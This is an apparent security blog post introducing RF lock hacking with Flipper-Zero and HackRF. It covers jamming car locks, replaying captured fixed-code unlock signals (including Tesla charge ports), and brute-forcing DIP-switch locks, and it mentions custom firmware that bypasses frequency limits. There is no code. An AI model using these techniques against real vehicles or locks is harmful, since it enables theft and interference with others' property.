Chaos-Sec-Lab
2023年10月20日星期五
Grand Theft Auto – RF Locks Hacking Flipper-Zero Edition Part 1
0x00. INTRODUCTION
I believe when people are new to hacking RF locks system. One of the most common questions they will ask is which tools they will need. Usually I would say HackRF is a must to have tool. Up recently, the Flipper-Zero became one of the most popular gadgets among RF hackers. To be honest, the first time I heard about Flipper-Zero, I was not that impressed. I already owned a bunch of wireless hacking tools, such as Proxmark3, Yardstick1 and HackRF-Portapack. Why should we get another toy that provides similar functions? Soon I learned that I was wrong about it. For instance, other than its rich wireless capability, Flipper-Zero has also provided extendable external modules through the GPIO ports. This feature made the Flipper-Zero become a LEGO of hackers ;)
(After 2-hours long wait in the queue, I finally got one at DEFCON31)
This article serves as a beginner’s RF lock system hacking journey, performing lock hacking with Flipper-Zero and other RF hacking tools. I hope each case study will help people get a better idea of what they would need for hacking RF locks.
0x01. SIGNAL JAMMING
One of the easiest yet effective RF attack techniques called signal jamming. The attacker is constantly sending noise signals at that same frequency channel as the target, hoping to jam the original signal to achieve interference. Jamming essentially disrupts communication between two or more devices by shouting louder. It does not matter what to shout, as long as others cannot hear you.
(Jamming signals on the spectrum diagram)
Jamming attacks against car locks are also one of thieves' favorites. Criminals use hidden jamming equipment to prevent car owners from locking their cars. Once car owners leave, they can easily open the car door and steal the belongings left inside the car. Although signal jamming is not a new concept, it continues to grow in popularity among criminals, as the technology used becomes more sophisticated and easily accessible.
Below is a video demonstration of the car jamming attack with HackRF. As you can see in the video below how effective the attack is. Please ensure the car door is securely locked before you leave.
Although Flipper Zero comes with certain regional and frequency restrictions, by installing a custom firmware (Xtreme) can bypassed this limit. This made Flipper-Zero perfect for experimenting with the jamming attack.
(Source from @McSHUR1KEN)
0x02. SIGNAL REPLAY BLINDLY
Of course, it would be cooler if we can control the target. The replay attack is one of the oldest tricks from the book that can achieve exactly that. Since most RF lock system operating frequency is at 315 MHz or 433 MHz range, and some of them still use fixed-code mechanism. Meaning we can just leave the capture device near the target and wait patiently. If lucky enough we will be able to catch the unlock signal for a later replay.
This is a lot like fishing, but the reward is unlock signal instead. Below is a video demonstration of the replay attack with HackRF. As you can see in the video below, it works as a charm.
Interestingly for Tesla’s charging port, it still uses a fixed-code mechanism. People can download the pre-recorded Tesla Charge Port files to the Flipper-Zero, and messing with other Tesla vehicle owners, yet not knowing what is really going on behind the scenes.
(Source from @takeapart)
0x03. SIGNAL REPLAY ANALYZE
Only blindly replaying the signal is not going to satisfy the Hackers. Unlike the jamming attacks, if we like to get to know our target better, we need to find out the target frequency, encoding method, chip model, etc. For example, we can learn the operating frequency by using the Frequency Analyzer application provided by Flipper-Zero.
(Source from a good amigo)
0x04. SIGNAL REPLAY BRUTEFORCE
Have you ever wondered if those fixed-code lock systems are bruteforceable? Here is an interesting lock; it comes with 8 DIP switches on both the lock and keyfob side, we can switch up, center and down to have different combinations.
0x05. SUMMARY
In this article, we have looked at the common methods of RF Locks hacking. In Part2, we are going to look at more advanced and interesting RF Locks hacking techniques. Stay tuned.
Last updated